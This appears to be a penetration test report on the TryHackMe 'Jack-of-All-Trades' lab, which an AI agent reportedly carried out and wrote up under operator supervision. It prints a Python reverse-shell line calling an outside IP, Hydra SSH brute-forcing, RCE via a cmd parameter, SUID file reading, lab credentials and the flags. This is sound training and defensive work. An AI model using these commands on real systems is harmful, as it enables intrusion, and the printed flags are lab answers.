Jack-of-All-Trades
Penetration Test Report
Jack-of-All-Trades — TryHackMe Lab
Date: April 25, 2026
Operator: wintermute
Executing Agent: Anthropic Claude Opus 4.7 (model ID claude-opus-4-7, 1M-context variant), running in Claude Code on Kali Linux
Difficulty: Easy
Target IP: 10.65.146.188
Scope: Single host, all ports
AI Authorship Disclosure
This engagement was carried out by an autonomous AI agent (Anthropic Claude Opus 4.7) operating from the operator's workstation under the alias above. The AI performed all reconnaissance, exploitation, flag capture, and authored this report end-to-end. The human operator supplied the target, authorised the scope (the TryHackMe lab in question), and supervised execution; no third-party systems were touched. All tool invocations (nmap, autorecon, curl, hydra, steghide, netcat, etc.) were issued by the agent via shell. Findings, payloads, and recommendations have not been independently re-verified by a human reviewer.
Executive Summary
A penetration test was conducted against the target host 10.65.146.188. The assessment identified multiple critical vulnerabilities including credential exposure via HTML source code, hidden data in image files (steganography), an unauthenticated remote code execution endpoint, SSH credential disclosure via a world-readable password list, and a SUID misconfiguration enabling full system compromise. Full root-level access was achieved.
Scope & Objectives
| Item | Detail |
|---|---|
| Target | 10.65.146.188 |
| Ports in Scope | All TCP/UDP |
| Objective | Identify and exploit vulnerabilities; capture user and root flags |
| Tools Used | nmap, autorecon, curl, steghide, hydra, netcat |
Findings Summary
| # | Vulnerability | Severity | CVSS |
|---|---|---|---|
| 1 | Credentials Exposed in HTML Source | Critical | 9.1 |
| 2 | Sensitive Data Hidden in Image (Steganography) | High | 7.5 |
| 3 | Unauthenticated Remote Code Execution | Critical | 9.8 |
| 4 | World-Readable Password List | High | 8.1 |
| 5 | SUID Misconfiguration (strings) | High | 7.8 |
| 6 | Non-Standard Service Ports | Informational | — |
Reconnaissance
Port Scan — nmap
PORT STATE SERVICE VERSION
22/tcp open http Apache httpd 2.4.10 ((Debian))
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
Notable: Services were deliberately swapped — HTTP ran on port 22 and SSH on port 80. This is security through obscurity and provides no meaningful protection.
OS / Kernel: Linux 3.16.0-4-amd64 (Debian, 2015) — significantly outdated.
Attack Chain
Step 1 — Credential Disclosure in HTML Source (Critical)
Browsing the homepage at http://10.65.146.188:22/ revealed two HTML comments:
Comment 1 — Recovery endpoint:
<!-- Note to self - If I ever get locked out I can get back in at /recovery.php! -->
Comment 2 — Base64 encoded string:
UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9i...
Decoded:
Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems
are amazing! Also gotta remember your password: u?WtKSraq
Credentials obtained: u?WtKSraq
Step 2 — Steganography: CMS Credentials in header.jpg (High)
The /recovery.php page contained a Base32-encoded comment that decoded (via Base32 → Hex → ROT13) to:
> "Remember that the credentials to the recovery login are hidden on the homepage!"
Using the password u?WtKSraq with steghide against header.jpg:
steghide extract -sf header.jpg -p "u?WtKSraq"
Extracted file cms.creds:
Username: jackinthebox
Password: TplFxiSHjY
Step 3 — Remote Code Execution via Hidden CMS (Critical)
Authenticating to /recovery.php with jackinthebox:TplFxiSHjY redirected to a hidden endpoint:
/nnxhweOV/index.php
This page accepted a cmd GET parameter and executed arbitrary OS commands as www-data:
curl "http://10.65.146.188:22/nnxhweOV/index.php?cmd=id"
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
A Python reverse shell was used to establish an interactive session:
python -c "import socket,subprocess,os;s=socket.socket(...);s.connect(('192.168.236.254',4444));..."
Step 4 — World-Readable Password List (High)
Enumeration of the filesystem revealed /home/jacks_password_list — a plaintext file containing 24 passwords, readable by all users including www-data.
SSH on port 80 was brute-forced using Hydra:
hydra -l jack -P jacks_password_list ssh://10.65.146.188:80 -t 4
Result: jack:ITMJpGGIqg1jn?>@
Step 5 — Privilege Escalation via SUID strings (High)
Enumeration of SUID binaries revealed an unusual entry:
find / -perm -4000 -type f 2>/dev/null
# /usr/bin/strings
strings is a standard text extraction utility with no legitimate reason to carry the SUID bit. Because it runs as root, it can read any file on the system regardless of permissions:
/usr/bin/strings /root/root.txt
This disclosed the root flag and full contents of /root/root.txt.
Flags
| Flag | Value |
|---|---|
| User | securi-tay2020_{p3ngu1n-hunt3r-3xtr40rd1n41r3} |
| Root | securi-tay2020_{6f125d32f38fb8ff9e720d2dbce2210a} |
Vulnerabilities & Recommendations
1. Credentials Exposed in HTML Source — Critical
Description: Plaintext credentials and sensitive notes were embedded in HTML comments, visible to anyone who views the page source.
Recommendation: Never store credentials, internal paths, or notes in client-facing code. Use server-side session management and remove all debug/development comments before deployment.
2. Sensitive Data in Images (Steganography) — High
Description: CMS credentials were hidden inside header.jpg using steghide. While steganography obscures data, it is not encryption and provides weak protection, especially when the passphrase is already exposed.
Recommendation: Do not use steganography as a credential storage mechanism. Store credentials in a secrets manager (e.g., HashiCorp Vault, AWS Secrets Manager).
3. Unauthenticated Remote Code Execution — Critical
Description: The CMS at /nnxhweOV/index.php passed user-supplied input directly to a system shell via the cmd GET parameter with no sanitisation, authentication enforcement, or rate limiting.
Recommendation: Remove or properly authenticate all administrative endpoints. Never pass user-controlled input to shell execution functions. Implement a WAF for additional defence-in-depth.
4. World-Readable Password List — High
Description: /home/jacks_password_list was readable by all users on the system, enabling privilege escalation from www-data to jack via SSH credential brute-forcing.
Recommendation: Never store plaintext password lists on disk. If a credential store is necessary, restrict file permissions (chmod 600) and store it only in the owning user's home directory.
5. SUID Misconfiguration on strings — High
Description: /usr/bin/strings had the SUID bit set, allowing any local user to read arbitrary files as root, bypassing all filesystem permissions.
Recommendation: Audit all SUID binaries regularly. Remove the SUID bit from any binary that does not require it:
chmod u-s /usr/bin/strings
Use tools such as linpeas, pspy, or periodic find / -perm -4000 audits to detect rogue SUID files.
6. Outdated Software & Non-Standard Ports — Informational
Description: The kernel (3.16.0, 2015) and Apache (2.4.10) are significantly out of date and likely vulnerable to known exploits. Running services on non-standard ports provides no meaningful security benefit.
Recommendation: Apply all available security patches. Maintain a regular patching cadence. Do not rely on port obfuscation as a security control.
Appendix — Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service enumeration |
| autorecon | Automated multi-tool reconnaissance |
| curl | Web request crafting and RCE interaction |
| steghide | Steganography extraction |
| hydra | SSH credential brute-forcing |
| netcat | Reverse shell listener |
| strings | Flag extraction via SUID abuse |